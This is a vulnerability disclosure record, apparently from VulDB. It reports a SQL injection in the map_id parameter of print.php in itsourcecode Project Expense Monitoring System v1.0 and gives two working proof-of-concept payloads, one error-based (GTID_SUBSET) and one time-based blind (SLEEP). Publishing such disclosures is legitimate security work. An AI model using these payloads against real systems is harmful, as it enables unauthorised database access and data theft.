| Title | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| Description | Constructing a special SQL statement in the print.php page and passing it in the map_id parameter can lead to a SQL injection vulnerability.
POC:
Parameter: map_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: map_id=67' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(5075=5075,1))),0x716b717671),5075)-- xGVQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: map_id=67' AND (SELECT 2049 FROM (SELECT(SLEEP(5)))IStZ)-- PtEB |
|---|
| Source | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-3.md |
|---|
| User | GUOTINGTING (UID 73614) |
|---|
| Submission | 08/17/2024 14:15 (2 years ago) |
|---|
| Moderation | 08/19/2024 16:12 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 275120 [itsourcecode Project Expense Monitoring System 1.0 print.php map_id sql injection] |
|---|
| Points | 20 |
|---|